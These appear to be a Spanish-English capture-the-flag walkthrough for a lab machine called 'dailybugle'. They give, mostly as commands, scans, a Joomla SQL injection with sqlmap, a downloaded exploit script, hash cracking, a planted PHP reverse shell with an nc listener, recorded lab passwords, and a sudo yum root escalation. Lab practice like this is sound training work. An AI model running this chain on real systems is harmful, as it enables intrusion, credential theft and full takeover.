nmap -A -p- -oA output 10.10.126.115 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA dailybugle 10.10.126.115

nmap -sU -O -p- -oA dailybugle-udp 10.10.126.115

nikto -h 10.10.10.126.115:80

gobuster dir -k -u http://10.10.126.115/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Vemos que version de joomla es

curl -s http://10.10.126.115/README.txt | head

joomscan --url http://10.10.126.115

Parece que tiene un cve esta version de joomla https://www.exploit-db.com/exploits/42033

sqlmap -u "http://10.10.126.115/index.php?option=com\_fields&view=fields&layout=modal&list\[fullordering\]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list\[fullordering\]

wget https://raw.githubusercontent.com/stefanlucas/Exploit-Joomla/master/joomblah.py

python joomblah.py http://10.10.126.115

john jonah_user.hash --wordlist=/usr/share/wordlists/rockyou.txt

Vamos a la pagina de administrador jonah/spiderman123

Le damos click a index.php

Ponemos el codigo que encontramos aqui de reverse shell en index.php

https://github.com/pentestmonkey/php-reverse-shell

nc -lvnp 5555

Le damos click a template preview

ls ls home ls /var/www/html

cat /var/www/html/configuration.php

Encontramos la contrasena de mysql

Usamos las credenciales

jjameson/v5uz9r3ZEDzVjNu

Vemos cual es el OS y parece que es redhat

cat /etc/redhat-release

[jjameson@dailybugle ~\]$ TF=$(mktemp -d)
[jjameson@dailybugle ~\]$ cat >$TF/x<<EOF
> \[main\]
> plugins=1
> pluginpath=$TF
> pluginconfpath=$TF
> EOF
\[jjameson@dailybugle ~\]$ cat >$TF/y.conf<<EOF
> \[main\]
> enabled=1
> EOF
\[jjameson@dailybugle ~\]$ cat >$TF/y.py<<EOF
> import os
> import yum
> from yum.plugins import PluginYumExit, TYPE\_CORE, TYPE\_INTERACTIVE
> requires\_api\_version='2.1'
> def init\_hook(conduit):
>   os.execl('/bin/sh','/bin/sh')
> EOF
\[jjameson@dailybugle ~\]$ sudo yum -c $TF/x --enableplugin=y
Loaded plugins: y
No plugin match for: y